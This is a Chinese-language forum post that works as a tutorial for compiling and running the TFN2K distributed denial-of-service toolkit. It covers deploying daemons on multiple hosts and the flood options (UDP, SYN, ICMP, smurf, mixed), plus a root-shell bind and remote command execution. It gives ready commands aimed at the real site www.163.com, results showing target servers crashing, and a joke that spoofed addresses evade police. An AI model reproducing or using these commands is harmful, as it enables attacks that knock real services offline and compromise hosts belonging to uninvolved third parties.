广告：
网页制作参考
千千学园
雨路开发频道
雨路技术文档
技术问答
编程技术

安全说的多了,说说攻击吧,作为本论坛的新人,请大家指正
首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的redhat linux进
行测试,本次攻击测试我使用的是fedora core3 ,软件用的是最有名的ddos攻击工具
tfn2k linux版,被攻击的windows服务器系统使用的是windows2000
server 服务开有apache2 ftp vnc关系不大,主要攻击apache
废话不说了,开始设置服务器.
0.解压 tar -zxvf tfn2k.tgz
1.安装tfn2k
tfn2k为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有
几个地方是必需注意的,因为使用不同版本和厂商的linux需要不同的设置.
先修改src/ip.h
注释掉以下部分，否则编译出错。
　　　
/*struct in_addr
　　　{
　　 unsigned long int s_addr;
};*/
然后make进行编译
编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出
现两个新的执行文件td 和 tfn,其中td是守护进程,也是客户机的使用进程,而tfn是服务器
控制进程,如果想攻击别人就必需先起动td这个进程,然后再运行服务器进程,否则攻击无效,
更改密码可以执行mkpass进行更改,最后在所有的客户机中安装并运行td(需要root权
限),并且在服务器上建立一个文本文件,文件中记录所有的客户机ip地址(用vi编辑一个就
可行了),格式为:
192.168.0.1
192.168.0.2
192.168.0.3
ip
ip
.....
然后在主服务器上运行./tfn
2.攻击
./tfn直接回车大家可以看到一些参数,英文好的朋友估计不用我来多讲了:)
格式./tfn <参数>
无用的参数我们不提,我们来说攻击用的
-f 这个参数后面跟刚才所写的文本文件名,就是真正实现ddos攻击,而不是dos
-h dos攻击,也就是单机,一对一的攻击 后面跟一个主机或ip地址
-p 后面指定一个端口,不用说了
-c 最关键的参数,一共有11个选相
0 - 停止攻击,发善心用的
1 - 反欺骗等级设定 ,因为tfn这个工具在攻击的时候所发出的数据包是带有源地址的,但是
源地址是随机的,也就是说地址不是你自给的,所以不用担心警察抓,哈哈
2 - 改编数据包的包尺寸：缺省的icmp/8,smurf,udp攻击缺省使用最小包。你可以通过
改变每个包的有效载荷的字节增加它的大小。
3　-　绑定root　shell:启动一个会话服务，然后你连接一个指定端口就可以得到一个root
shell。
4　-　udp洪水攻击：这个攻击是利用这样一个事实：每个udp包被送往一个关闭的端口，
这样就会有一个icmp不可到达的信息返回，增加了攻击的能力。
5　-　syn洪水攻击：这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务，
添瞒tcp连接表，通过对不存在主机的tcp/rst响应增加攻击潜力,是标准的拒绝服务攻
击.
6　-　icmp响应(ping)攻击：这个攻击发送虚假地址的ping请求，目标主机会回送相同
大小的响应包。
7 - smurf攻击：用目标主机的地址发送ping请求以广播扩大，这样目标主机将得到回
复一个多倍的回复。
8　-　mix攻击：按照1:1:1的关系交替的发送udp,syn,icmp包，这样就可以对付路由
器，其它包转发设备，nids,sniffers等,轮番轰炸:)
9　- targa3攻击
10　-　远程命令执行,这个参数是tfn的附加功能,其实tfn的攻击不仅仅是dos,还可以
远程的进行明令控制,如:
./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的host上root家目录建立
edison,-i后面跟"命令"
参数基本说完,下面攻击
./tfn -f hostext -c 4 -i www.163.com
使用hostext文件中记录的主机对163服务器进行udp攻击(所有的主机中必需已经起动
td进程)
./tfn -f hostext -c 5 -i www.163.com -p 80
使用hostext文件中记录的主机对163服务器进行tcp拒绝服务攻击(80攻击web,其他
不用说了)
./tfn -f hostext -c 6 -i www.163.com
使用hostext文件中记录的主机对163服务器进行icmp攻击(ping攻击,缓冲区溢出马上
死机)
./tfn -f hostext -c 8 -i www.163.com
使用hostext文件中记录的主机对163服务器进行icmp&tcp&udp轮番攻击(如果对方
是sniffer一定哭死)
./tfn -f hostext -c 0
让所由主机停止攻击
基本说完,最后说说我的测试结果
一对一攻击,攻击方式tcp 连接方式本地 本地cpu13% 被攻击的服务器cpu使用率70%
以上,并时时波动
二对一攻击,攻击方式tcp 连接方式本地 本地单机cpu13% 被攻击的服务器cpu使用率
100%
五对一攻击,攻击方式tcp 连接方式本地 本地单机cpu13% 被攻击的服务器死机
本人家里只有6台机器,但如果再多点,几十台机器,一般的个人服务器肯定要死掉了
一对一攻击,攻击方式icmp 连接方式本地 本地cpu18% 被攻击的服务器cpu使用率
96%以上,并时时波动
二对一攻击,攻击方式icmp 连接方式本地 本地单机cpu18% 被攻击的服务器以经无法上
网,几乎无法使用,半小时内死机
看来威力不小,请个位手下留情啊:p

（）